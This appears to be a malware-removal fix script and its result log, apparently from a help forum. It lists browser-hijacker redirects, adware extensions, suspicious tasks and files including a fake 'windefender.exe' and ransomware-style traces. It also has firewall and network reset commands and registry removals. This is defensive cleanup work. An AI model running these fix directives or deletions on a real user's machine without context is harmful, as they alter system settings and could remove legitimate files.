    HKU\S-1-5-21-3161437104-263828448-1275724104-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoHCxomeujIo3zShD1-ctwyql0weKHh5feEcga2qczG8ei0cxT5EOl2TGGgb5drtf4DQEi4gHxvy9W14uwks95rdBWH-p77UI3RI8987DLglboaxIzu7pyiEuqM_wd42dimnh3JBjZZrhlVqmsy5ItaCzx3PkdRB3hCbmY83RiDib
    SearchScopes: HKLM -> {26080cad-4adc-49ac-8c63-eda16e595cbd} URL = hxxps://in.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_nptdwxol_18_43_10&param1=1&param2=f%3D4%26b%3DIE%26cc%3Din%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1Qzu0E0C0AzzyC0ByBtB0E0Dzz0F0FtDyEtCtN0D0Tzu0StByEzytBtN1L2XzuyEtFtByCtFtDtFtCyBtBtN1L1CzutN1L1G1B1V1N2Y1L1Qzu2StC0B0ByC0EyCzyyCtGtByD0A0CtGyB0FtCyBtGtD0BtA0DtG0EtCtAzzyBtBtC0E0C0AtC0C2QtN1M1F1B2Z1V1N2Y1L1Qzu2StCtCtCtB1T1O1RyBtG1Q1O1TyCtGyEtCyB1TtGzytByEzytG1OyE1QyE1Rzy1S1Q1R1O1OyC2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCzyyDyByDtN1Q2Z1B1P1RzutCyDyEtDyBtBzztDyEyC%26cr%3D1292663095%26a%3Dwbf_nptdwxol_18_43_10%26os_ver%3D6.1%26os%3DWindows%2B7%2BUltimate&p={searchTerms}
    SearchScopes: HKLM -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = hxxp://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfQtZAAwVRQQQbQ4IUFpcFQ1HIRRZVQsXDFMRcVsMVw8QRAMWdx9aFQQTSEcFME0FCFwEURNNfW1KCFgfRllGFEtZCFU=&q={searchTerms}
    SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL =
    SearchScopes: HKLM-x32 -> ielnksrch URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoHCxomeujIo3zShD1-ctwyql0weKHh5feEcga2qczG8ei0cxT5EOl2TGGgb5drtf4DQEi4gHxvy9W14iNyhvwM8cNgCv0nNcgJUKiAGbbU139vtitIVxADHdMlFE1CBaLJ4mQ9SQGF57Wob-cABo6mYfOrXjmkNaKrCgsrJI5VLU&q={searchTerms}
    SearchScopes: HKLM-x32 -> {26080cad-4adc-49ac-8c63-eda16e595cbd} URL = hxxps://in.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_nptdwxol_18_43_10&param1=1&param2=f%3D4%26b%3DIE%26cc%3Din%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1Qzu0E0C0AzzyC0ByBtB0E0Dzz0F0FtDyEtCtN0D0Tzu0StByEzytBtN1L2XzuyEtFtByCtFtDtFtCyBtBtN1L1CzutN1L1G1B1V1N2Y1L1Qzu2StC0B0ByC0EyCzyyCtGtByD0A0CtGyB0FtCyBtGtD0BtA0DtG0EtCtAzzyBtBtC0E0C0AtC0C2QtN1M1F1B2Z1V1N2Y1L1Qzu2StCtCtCtB1T1O1RyBtG1Q1O1TyCtGyEtCyB1TtGzytByEzytG1OyE1QyE1Rzy1S1Q1R1O1OyC2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCzyyDyByDtN1Q2Z1B1P1RzutCyDyEtDyBtBzztDyEyC%26cr%3D1292663095%26a%3Dwbf_nptdwxol_18_43_10%26os_ver%3D6.1%26os%3DWindows%2B7%2BUltimate&p={searchTerms}
    SearchScopes: HKU\S-1-5-21-3161437104-263828448-1275724104-1000 -> DefaultScope {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoHCxomeujIo3zShD1-ctwyql0weKHh5feEcga2qczG8ei0cxT5EOl2TGGgb5drtf4DQEi4gHxvy9W14iNyhvwM8cNgCv0nNcgJUKiAGbbU139vtitIVxADHdMlFE1CBaLJ4mQ9SQGF57Wob-cABo6mYfOrXjmkNaKrCgsrJI5VLU&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-3161437104-263828448-1275724104-1000 -> {26080cad-4adc-49ac-8c63-eda16e595cbd} URL = hxxps://in.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_nptdwxol_18_43_10&param1=1&param2=f%3D4%26b%3DIE%26cc%3Din%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1Qzu0E0C0AzzyC0ByBtB0E0Dzz0F0FtDyEtCtN0D0Tzu0StByEzytBtN1L2XzuyEtFtByCtFtDtFtCyBtBtN1L1CzutN1L1G1B1V1N2Y1L1Qzu2StC0B0ByC0EyCzyyCtGtByD0A0CtGyB0FtCyBtGtD0BtA0DtG0EtCtAzzyBtBtC0E0C0AtC0C2QtN1M1F1B2Z1V1N2Y1L1Qzu2StCtCtCtB1T1O1RyBtG1Q1O1TyCtGyEtCyB1TtGzytByEzytG1OyE1QyE1Rzy1S1Q1R1O1OyC2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCzyyDyByDtN1Q2Z1B1P1RzutCyDyEtDyBtBzztDyEyC%26cr%3D1292663095%26a%3Dwbf_nptdwxol_18_43_10%26os_ver%3D6.1%26os%3DWindows%2B7%2BUltimate&p={searchTerms}
    SearchScopes: HKU\S-1-5-21-3161437104-263828448-1275724104-1000 -> {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoHCxomeujIo3zShD1-ctwyql0weKHh5feEcga2qczG8ei0cxT5EOl2TGGgb5drtf4DQEi4gHxvy9W14iNyhvwM8cNgCv0nNcgJUKiAGbbU139vtitIVxADHdMlFE1CBaLJ4mQ9SQGF57Wob-cABo6mYfOrXjmkNaKrCgsrJI5VLU&q={searchTerms}
    BHO: YoutubeAdBlock -> {7F5C0C11-7E68-4D65-868E-AE2BE9EEB44E} -> C:\Program Files (x86)\vONNFjhTKIE\trHrwkx7.dll => No File
    BHO: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> No File
    BHO: MyStart Toolbar -> {ccb24e92-62c4-4c53-95d2-65f9eed476bc} -> C:\Program Files (x86)\mystarttb\mystartDx64.dll => No File
    BHO-x32: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\Office15\OCHelper.dll => No File
    BHO-x32: Triangle Trail -> {aeef4389-6327-45e5-9552-021c0f5aef2d} -> No File
    BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\PROGRA~2\MICROS~1\Office15\URLREDIR.DLL => No File
    BHO-x32: MyStart Toolbar -> {ccb24e92-62c4-4c53-95d2-65f9eed476bc} -> C:\Program Files (x86)\mystarttb\mystartDx.dll => No File
    BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\PROGRA~2\MICROS~1\Office15\GROOVEEX.DLL => No File
    Toolbar: HKLM - MyStart Toolbar - {ccb24e92-62c4-4c53-95d2-65f9eed476bc} - C:\Program Files (x86)\mystarttb\mystartDx64.dll No File
    Toolbar: HKLM-x32 - MyStart Toolbar - {ccb24e92-62c4-4c53-95d2-65f9eed476bc} - C:\Program Files (x86)\mystarttb\mystartDx.dll No File
    FF user.js: detected! => C:\Users\ADMIN\AppData\Roaming\Mozilla\Firefox\Profiles\5xrpb4mz.default\user.js [2015-12-10]FF Homepage: Mozilla\Firefox\Profiles\5xrpb4mz.default -> file:///C:/ProgramData/Quoteexs/ff.HPFF NewTab: Mozilla\Firefox\Profiles\5xrpb4mz.default -> file:///C:/ProgramData/Quoteexs/ff.NT
    FF Extension: (MyStart Toolbar) - C:\Users\ADMIN\AppData\Roaming\Mozilla\Firefox\Profiles\5xrpb4mz.default\Extensions\{607b689f-7600-45e4-b8e5-887f72dab15c} [2015-11-07] [Legacy] [not signed]
    FF Extension: (Triangle Trail) - C:\Users\ADMIN\AppData\Roaming\Mozilla\Firefox\Profiles\5xrpb4mz.default\Extensions\{f2e0e2a9-4e09-4b8a-aadb-fa21ba86ba05}.xpi [2015-12-04] [Legacy] [not signed]
    FF SearchPlugin: C:\Users\ADMIN\AppData\Roaming\Mozilla\Firefox\Profiles\5xrpb4mz.default\searchplugins\default.xml [2016-06-26]
    FF SearchPlugin: C:\Users\ADMIN\AppData\Roaming\Mozilla\Firefox\Profiles\5xrpb4mz.default\searchplugins\findit.xml [2019-07-08]
    FF SearchPlugin: C:\Users\ADMIN\AppData\Roaming\Mozilla\Firefox\Profiles\5xrpb4mz.default\searchplugins\yahoo_ff.xml [2015-12-25]
    FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [No File]
    FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office15\NPSPWRAP.DLL [No File]
    CHR HomePage: Default -> hxxp://search.gboxapp.com/
    CHR StartupUrls: Default -> "hxxp://search.gboxapp.com/"
    CHR DefaultSearchURL: Default -> hxxp://selected-search.com/search?q={searchTerms}&
    CHR DefaultSearchKeyword: Default -> ss
    CHR HKLM\...\Chrome\Extension: [afgeoapebnkefelmpoepnmjiflidjjce] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM\...\Chrome\Extension: [egenicdiafgbhogabodhpfcbcgnpocip] - hxxps://clients2.google.com/service/update2/crx

    CHR HKLM\...\Chrome\Extension: [hppemobdikemkbmccnjbilolonmpaljl] - hxxps://clients2.google.com/service/update2/crx

    CHR HKLM\...\Chrome\Extension: [nahhmpbckpgdidfnmfkfgiflpjijilce] - hxxps://clients2.google.com/service/update2/crx

    CHR HKLM\...\Chrome\Extension: [olojcnagmcbplpdddabmpfehhlleobpb] - hxxps://clients2.google.com/service/update2/crx

    CHR HKLM\...\Chrome\Extension: [pdpcpceofkopegffcdnffeenbfdldock] - hxxps://clients2.google.com/service/update2/crx

    CHR HKLM\...\Chrome\Extension: [pilplloabdedfmialnfchjomjmpjcoej] - hxxps://clients2.google.com/service/update2/crx

    CHR HKU\S-1-5-21-3161437104-263828448-1275724104-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [afgeoapebnkefelmpoepnmjiflidjjce] - hxxps://clients2.google.com/service/update2/crx

    CHR HKU\S-1-5-21-3161437104-263828448-1275724104-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [egenicdiafgbhogabodhpfcbcgnpocip] - hxxps://clients2.google.com/service/update2/crx

    CHR HKU\S-1-5-21-3161437104-263828448-1275724104-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [hppemobdikemkbmccnjbilolonmpaljl] - hxxps://clients2.google.com/service/update2/crx

    CHR HKU\S-1-5-21-3161437104-263828448-1275724104-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [nahhmpbckpgdidfnmfkfgiflpjijilce] - hxxps://clients2.google.com/service/update2/crx
    CHR HKU\S-1-5-21-3161437104-263828448-1275724104-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [olojcnagmcbplpdddabmpfehhlleobpb] - hxxps://clients2.google.com/service/update2/crx
    CHR HKU\S-1-5-21-3161437104-263828448-1275724104-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [pdpcpceofkopegffcdnffeenbfdldock] - hxxps://clients2.google.com/service/update2/crx
    CHR HKU\S-1-5-21-3161437104-263828448-1275724104-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [pilplloabdedfmialnfchjomjmpjcoej] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [afgeoapebnkefelmpoepnmjiflidjjce] - hxxps://clients2.google.com/service/update2/crx

    CHR HKLM-x32\...\Chrome\Extension: [egenicdiafgbhogabodhpfcbcgnpocip] - hxxps://clients2.google.com/service/update2/crx

    CHR HKLM-x32\...\Chrome\Extension: [hppemobdikemkbmccnjbilolonmpaljl] - hxxps://clients2.google.com/service/update2/crx

    CHR HKLM-x32\...\Chrome\Extension: [iphahelpmejkbidhiecfeicblienleon] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [nahhmpbckpgdidfnmfkfgiflpjijilce] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [npdicihegicnhaangkdmcgbjceoemeoo] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [olojcnagmcbplpdddabmpfehhlleobpb] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [pdpcpceofkopegffcdnffeenbfdldock] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [pilplloabdedfmialnfchjomjmpjcoej] - hxxps://clients2.google.com/service/update2/crx
    OPR Extension: (Adblocker for Youtube™) - C:\Users\ADMIN\AppData\Roaming\Opera Software\Opera Stable\Extensions\nknpohplagminmhchlbhigcgcdfigion [2019-07-09]
    R2 backlh; C:\ProgramData\Logic Cramble\set.exe [3780096 2019-07-08] () [File not signed] <==== ATTENTION
    R2 CloudPrinter; C:\ProgramData\\CloudPrinter\\CloudPrinter.exe [1490432 2019-07-08] (TODO: <Company name>) [File not signed]

    R2 WinDefender; C:\Windows\windefender.exe [1435136 2019-07-08] () [File not signed]
    S3 WsDrvInst; "C:\Program Files (x86)\Wondershare\Dr.Fone for Android\DriverInstall.exe" [X]
    2019-07-09 15:06 - 2019-07-10 16:25 - 000000000 ____D C:\Program Files (x86)\BbdjrrKUeUXuC
    2019-07-09 15:06 - 2019-07-09 20:47 - 000000000 ____D C:\Program Files (x86)\WOFbcaOaHmAU2
    2019-07-09 15:06 - 2019-07-09 18:05 - 000000000 ____D C:\Program Files (x86)\vONNFjhTKIE
    2019-07-09 15:06 - 2019-07-09 16:01 - 000000000 ____D C:\Program Files (x86)\uvtpOaoQoRUn
    2019-07-09 15:06 - 2019-07-09 15:06 - 000003202 _____ C:\Windows\System32\Tasks\AWWcazHJnUfLPA
    2019-07-09 15:06 - 2019-07-09 15:06 - 000002890 _____ C:\Windows\System32\Tasks\mrAArNosEtAJT2
    2019-07-09 15:06 - 2019-07-09 15:06 - 000002872 _____ C:\Windows\System32\Tasks\raSRPAMuIMRBbwMvC2
    2019-07-09 15:06 - 2019-07-09 15:06 - 000002860 _____ C:\Windows\System32\Tasks\txgYfgWClJeJBSoaCDR2
    2019-07-09 15:06 - 2019-07-09 15:06 - 000002850 _____ C:\Windows\System32\Tasks\JSpPUlYEOjGQEpF2
    2019-07-09 15:06 - 2019-07-09 15:06 - 000000000 ____D C:\ProgramData\JrsbweBqGiQFiyVB
    2019-07-09 15:06 - 2019-07-09 15:06 - 000000000 ____D C:\Program Files (x86)\woOqILJDRwqbnTOZbgR
    2019-07-09 15:06 - 2019-07-09 15:06 - 000000000 ____D C:\Program Files (x86)\rZdaClXBU
    2019-07-09 15:05 - 2019-07-09 16:00 - 000000000 ____D C:\Users\ADMIN\AppData\Roaming\yrgtajo5ceo
    2019-07-09 15:05 - 2019-07-09 16:00 - 000000000 ____D C:\Program Files\A5H2CDJ5DL
    2019-07-08 17:15 - 2019-07-09 16:00 - 000000000 ____D C:\Users\ADMIN\AppData\Roaming\nhhb4gpoag4
    2019-07-08 17:15 - 2019-07-09 16:00 - 000000000 ____D C:\Program Files\1B0ZGH03DT
    2019-07-08 17:03 - 2019-07-09 15:36 - 000000391 _____ C:\Users\ADMIN\Downloads\policies.json.cezor
    2019-07-08 16:55 - 2019-07-09 16:00 - 000000000 ____D C:\Users\ADMIN\AppData\Roaming\st1oaktw2ol
    2019-07-08 16:55 - 2019-07-09 16:00 - 000000000 ____D C:\Program Files\9RIR0W407U
    2019-07-08 16:40 - 2019-07-08 16:40 - 000003154 _____ C:\Windows\System32\Tasks\{70FDB57E-0921-404D-8CC7-ADDDC8F32EF0}
    2019-07-08 16:36 - 2019-07-08 16:36 - 000003584 _____ C:\Windows\System32\Tasks\{B7E4FFCD-3871-411A-A449-6E0BC062B522}
    2019-07-08 16:20 - 2019-07-09 18:11 - 000256608 _____ C:\Users\ADMIN\AppData\Roaming\appdata.dat
    2019-07-08 16:18 - 2019-07-09 15:58 - 000003248 _____ C:\Windows\System32\Tasks\lsa64
    2019-07-08 16:18 - 2019-07-08 16:18 - 000001172 _____ C:\Users\ADMIN\_readme.txt
    2019-07-08 16:17 - 2019-07-09 18:06 - 000000000 ____D C:\Users\ADMIN\AppData\Local\41915b66-3c0e-4c75-b4d9-0c7c8eb59d6c
    2019-07-08 16:17 - 2019-07-08 16:17 - 000000000 ___DC C:\SystemID
    2019-07-08 16:14 - 2019-07-09 15:59 - 000000000 ____D C:\Users\ADMIN\AppData\Local\dc987dec-8cfa-49ee-8d5d-aa82c048178f
    2019-07-08 16:14 - 2019-07-09 15:06 - 000003448 _____ C:\Windows\System32\Tasks\Opera scheduled Autoupdate 711520318
    2019-07-08 16:14 - 2019-07-08 16:14 - 000003682 _____ C:\Windows\System32\Tasks\Time Trigger Task
    2019-07-08 16:13 - 2019-07-10 17:30 - 000000342 _____ C:\Windows\Tasks\Online Application V2G6.job
    2019-07-08 16:13 - 2019-07-10 17:30 - 000000342 _____ C:\Windows\Tasks\Online Application V2G5.job
    2019-07-08 16:13 - 2019-07-10 17:30 - 000000342 _____ C:\Windows\Tasks\Online Application V2G4.job
    2019-07-08 16:13 - 2019-07-10 17:26 - 000000342 _____ C:\Windows\Tasks\Online Application V2G3.job
    2019-07-08 16:13 - 2019-07-10 17:26 - 000000342 _____ C:\Windows\Tasks\Online Application V2G2.job
    2019-07-08 16:13 - 2019-07-10 17:26 - 000000342 _____ C:\Windows\Tasks\Online Application V2G1.job
    2019-07-08 16:13 - 2019-07-10 16:16 - 000000374 _____ C:\Windows\Tasks\Updater_Online_Application.job
    2019-07-08 16:13 - 2019-07-09 15:59 - 000000000 ____D C:\Users\ADMIN\AppData\Roaming\eppsrq3otww
    2019-07-08 16:13 - 2019-07-09 15:59 - 000000000 ____D C:\Program Files\S2SM7ZWF99
    2019-07-08 16:13 - 2019-07-09 15:59 - 000000000 ____D C:\Program Files (x86)\Reciper
    2019-07-08 16:13 - 2019-07-09 15:06 - 000003250 __RSH C:\ProgramData\ntuser.pol
    2019-07-08 16:13 - 2019-07-08 16:13 - 000825856 ____C C:\Default.xml
    2019-07-08 16:13 - 2019-07-08 16:13 - 000003206 _____ C:\Windows\System32\Tasks\Updater_Online_Application
    2019-07-08 16:13 - 2019-07-08 16:13 - 000003170 _____ C:\Windows\System32\Tasks\Online Application V2G6
    2019-07-08 16:13 - 2019-07-08 16:13 - 000003170 _____ C:\Windows\System32\Tasks\Online Application V2G5
    2019-07-08 16:13 - 2019-07-08 16:13 - 000003170 _____ C:\Windows\System32\Tasks\Online Application V2G4
    2019-07-08 16:13 - 2019-07-08 16:13 - 000003170 _____ C:\Windows\System32\Tasks\Online Application V2G3
    2019-07-08 16:13 - 2019-07-08 16:13 - 000003170 _____ C:\Windows\System32\Tasks\Online Application V2G2
    2019-07-08 16:13 - 2019-07-08 16:13 - 000003170 _____ C:\Windows\System32\Tasks\Online Application V2G1
    2019-07-08 16:13 - 2019-07-08 16:13 - 000000000 ____D C:\Users\ADMIN\AppData\Roaming\Microleaves
    2019-07-08 16:13 - 2019-07-08 16:13 - 000000000 ____D C:\Users\ADMIN\AppData\Roaming\EpicNet Inc
    2019-07-08 16:13 - 2019-07-08 16:13 - 000000000 ____D C:\Users\ADMIN\AppData\Local\AdvinstAnalytics
    2019-07-08 16:13 - 2019-07-08 16:13 - 000000000 ____D C:\Program Files (x86)\Seed Trade
    2019-07-08 16:13 - 2019-07-08 16:13 - 000000000 ____D C:\Program Files (x86)\Microleaves
    2019-07-08 16:12 - 2019-07-09 18:05 - 000000000 ____D C:\ProgramData\Logic Cramble
    2019-07-08 16:12 - 2019-07-09 15:07 - 000003486 _____ C:\Windows\System32\Tasks\ScheduledUpdate
    2019-07-08 16:12 - 2019-07-09 15:07 - 000003178 _____ C:\Windows\System32\Tasks\csrss
    2019-07-08 16:12 - 2019-07-08 16:12 - 001895383 _____ C:\Users\ADMIN\AppData\Local\Villalux.bin
    2019-07-08 16:12 - 2019-07-08 16:12 - 001435136 ____N C:\Windows\windefender.exe
    2019-07-08 16:12 - 2019-07-08 16:12 - 000015606 _____ C:\Windows\SysWOW64\findit.xml
    2019-07-08 16:12 - 2019-07-08 16:12 - 000000000 ____D C:\ProgramData\Quoteexs
    2019-07-08 16:12 - 2019-07-08 16:12 - 000000000 ____D C:\Program Files (x86)\foldershare
    2019-07-08 16:11 - 2019-07-09 16:09 - 000000000 ___HD C:\Windows\rss
    2019-07-08 16:11 - 2019-07-08 16:38 - 000722944 _____ C:\Users\ADMIN\AppData\Local\sha.db
    2019-07-08 16:11 - 2019-07-08 16:11 - 007942656 _____ C:\Users\ADMIN\AppData\Local\agent.dat
    2019-07-08 16:11 - 2019-07-08 16:11 - 002039119 _____ C:\Users\ADMIN\AppData\Local\Don-Sing.tst
    2019-07-08 16:11 - 2019-07-08 16:11 - 000140800 _____ C:\Users\ADMIN\AppData\Local\installer.dat
    2019-07-08 16:11 - 2019-07-08 16:11 - 000126464 _____ C:\Users\ADMIN\AppData\Local\noah.dat
    2019-07-08 16:11 - 2019-07-08 16:11 - 000126464 _____ C:\Users\ADMIN\AppData\Local\lobby.dat
    2019-07-08 16:11 - 2019-07-08 16:11 - 000072787 _____ C:\Users\ADMIN\AppData\Local\GreenZuntouch.tst
    2019-07-08 16:11 - 2019-07-08 16:11 - 000070992 _____ C:\Users\ADMIN\AppData\Local\Config.xml
    2019-07-08 16:11 - 2019-07-08 16:11 - 000054272 _____ C:\Users\ADMIN\AppData\Local\ApplicationHosting.dat
    2019-07-08 16:11 - 2019-07-08 16:11 - 000018432 _____ C:\Users\ADMIN\AppData\Local\Main.dat
    2019-07-08 16:11 - 2019-07-08 16:11 - 000016416 _____ C:\Users\ADMIN\AppData\Local\InstallationConfiguration.xml
    2019-07-08 16:11 - 2019-07-08 16:11 - 000005568 _____ C:\Users\ADMIN\AppData\Local\md.xml
    2019-07-08 16:11 - 2019-07-08 16:11 - 000000000 ____D C:\ProgramData\CloudPrinter
    2019-07-03 14:50 - 2019-07-03 14:50 - 000196533 _____ C:\Users\ADMIN\AppData\Roaming\Beguk
    2019-06-25 14:31 - 2019-06-25 14:31 - 000250751 _____ C:\Users\ADMIN\AppData\Roaming\Gisigo
    2019-07-10 17:13 - 2019-02-27 20:13 - 000000270 _____ C:\Windows\Tasks\{67B56D17-7F1F-A4E3-5640-5A99ED1D0072}.job

    2019-07-10 17:00 - 2018-10-28 17:30 - 000000558 _____ C:\Windows\Tasks\Yahoo! Powered rasin.job
    2019-07-10 17:00 - 2018-10-28 17:30 - 000000000 ____D C:\ProgramData\{C7A902CA-4DEB-880C-CB2D-164E516F9D80}
    2019-07-10 16:50 - 2019-03-31 00:14 - 000000282 _____ C:\Windows\Tasks\{633E5C42-23C4-ABE8-66E1-2266DBE038D4}.job
    2019-07-08 16:20 - 2019-07-09 18:11 - 000256608 _____ () C:\Users\ADMIN\AppData\Roaming\appdata.dat
    2019-02-16 14:31 - 2019-02-16 14:31 - 000249337 _____ () C:\Users\ADMIN\AppData\Roaming\Babesog
    2019-06-17 12:50 - 2019-06-17 12:50 - 000337779 _____ () C:\Users\ADMIN\AppData\Roaming\Bopirolifeb
    2019-04-08 13:13 - 2019-04-08 13:13 - 000329578 _____ () C:\Users\ADMIN\AppData\Roaming\Fobacapekilu
    2019-06-09 11:31 - 2019-06-09 11:31 - 000297976 _____ () C:\Users\ADMIN\AppData\Roaming\Fubarum
    2019-03-31 00:13 - 2019-03-31 00:13 - 000291119 _____ () C:\Users\ADMIN\AppData\Roaming\Gerepokuf
    2019-03-22 13:13 - 2019-03-22 13:13 - 000182941 _____ () C:\Users\ADMIN\AppData\Roaming\Koceramo
    2019-05-07 11:49 - 2019-05-07 11:49 - 000144507 _____ () C:\Users\ADMIN\AppData\Roaming\Lepicufip
    2019-07-08 16:20 - 2019-07-09 16:00 - 000000001 _____ () C:\Users\ADMIN\AppData\Roaming\lsa64.log
    2019-05-24 10:50 - 2019-05-24 10:50 - 000319443 _____ () C:\Users\ADMIN\AppData\Roaming\Mifebe
    2019-02-07 13:54 - 2019-02-07 13:54 - 000243427 _____ () C:\Users\ADMIN\AppData\Roaming\Mumimehohil
    2019-06-01 10:50 - 2019-06-01 10:50 - 000268555 _____ () C:\Users\ADMIN\AppData\Roaming\Netab
    2019-04-28 13:13 - 2019-04-28 13:13 - 000193750 _____ () C:\Users\ADMIN\AppData\Roaming\Nocekerotacu
    2019-03-14 11:13 - 2019-03-14 11:13 - 000295864 _____ () C:\Users\ADMIN\AppData\Roaming\Racadebul
    2019-05-15 12:31 - 2019-05-15 12:31 - 000180383 _____ () C:\Users\ADMIN\AppData\Roaming\Rolecunotif
    2019-03-05 12:31 - 2019-03-05 12:31 - 000180839 _____ () C:\Users\ADMIN\AppData\Roaming\Sokacapo
    2019-02-25 12:31 - 2019-02-25 12:31 - 000153706 _____ () C:\Users\ADMIN\AppData\Roaming\Suhec
    2019-05-24 19:11 - 2019-05-24 19:55 - 000000126 _____ () C:\Users\ADMIN\AppData\Local\Autosofted License.txt
    2019-07-08 16:11 - 2019-07-08 16:11 - 000018432 _____ () C:\Users\ADMIN\AppData\Local\Main.dat
    2019-07-08 16:12 - 2019-07-08 16:12 - 000032038 _____ () C:\Users\ADMIN\AppData\Local\uninstall_temp.ico
    2015-11-07 09:12 - 2015-11-07 09:12 - 000000003 _____ () C:\Users\ADMIN\AppData\Local\updater.log
    2015-11-07 09:12 - 2017-05-10 13:06 - 000000425 _____ () C:\Users\ADMIN\AppData\Local\UserProducts.xml
    ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
    ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
    AlternateDataStreams: C:\Users\ADMIN\Documents\Local Disk (C:).exe [0]
    C:\Windows\windefender.exe
    c:\users\admin\appdata\local\chromium
    C:\Program Files (x86)\mystarttb
    C:\Users\ADMIN\AppData\Roaming\633E5C~1
    C:\Users\ADMIN\AppData\Roaming\Mefifi
    C:\Users\ADMIN\AppData\Roaming\Microsoft\Windows\cuebedbh
    C:\Users\ADMIN\AppData\Roaming\633e5c4223c4abe866e12266dbe038d4
    C:\Program Files\NVIDIA Corporation\MAK7CBDCE4NDDPY
    virustotal: C:\Users\ADMIN\AppData\Local\Programs\Opera\launcher.exe;C:\Users\ADMIN\AppData\Roaming\WB.CFG;C:\Users\ADMIN\Documents\Local Disk (C:).exe
    cmd: ipconfig /flushdns
    cmd: ipconfig /release
    cmd: ipconfig /renew
    cmd: netsh advfirewall reset
    cmd: netsh advfirewall set allprofiles state ON
    cmd: netsh winsock reset catalog
    cmd: netsh int ip reset c:\resetlog.txt
    cmd: netsh int ipv4 reset
    cmd: netsh int ipv6 reset
    Removeproxy:
    CMD: Bitsadmin /Reset /Allusers
    end
    *****************

    Restore point was successfully created.
    Processes closed successfully.
    HKLM\SOFTWARE\Policies\Microsoft\Windows Defender => removed successfully
    "HKU\S-1-5-21-3161437104-263828448-1275724104-1000\Software\Microsoft\Windows\CurrentVersion\Run\\Chromium" => removed successfully
    "HKU\S-1-5-21-3161437104-263828448-1275724104-1000\Software\Microsoft\Windows\CurrentVersion\Run\\SummerDew" => removed successfully
    "HKU\S-1-5-21-3161437104-263828448-1275724104-1000\Software\Microsoft\Windows\CurrentVersion\Run\\nSAAPfUJ4L.exe" => removed successfully
    "HKU\S-1-5-21-3161437104-263828448-1275724104-1000\Software\Microsoft\Windows\CurrentVersion\Run\\3158557" => removed successfully
    "HKU\S-1-5-21-3161437104-263828448-1275724104-1000\Software\Microsoft\Windows\CurrentVersion\Run\\4166405" => removed successfully
    "HKU\S-1-5-21-3161437104-263828448-1275724104-1000\Software\Microsoft\Windows\CurrentVersion\Run\\ZXMHTBNP7AK3TRL" => removed successfully
    "HKU\S-1-5-21-3161437104-263828448-1275724104-1000\Software\Microsoft\Windows\CurrentVersion\Run\\SysHelper" => removed successfully
    "HKU\S-1-5-21-3161437104-263828448-1275724104-1000\Software\Microsoft\Windows\CurrentVersion\Run\\7073823" => removed successfully
    "HKU\S-1-5-21-3161437104-263828448-1275724104-1000\Software\Microsoft\Windows\CurrentVersion\Run\\01GFF9BFRDRUU24" => removed successfully
    "HKU\S-1-5-21-3161437104-263828448-1275724104-1000\Software\Microsoft\Windows\CurrentVersion\Run\\3285487" => removed successfully
    "HKU\S-1-5-21-3161437104-263828448-1275724104-1000\Software\Microsoft\Windows\CurrentVersion\Run\\OX2EPEHB3K6HVZM" => removed successfully
    "HKU\S-1-5-21-3161437104-263828448-1275724104-1000\Software\Microsoft\Windows\CurrentVersion\Run\\ISYBWUOOMWPDFOI" => removed successfully
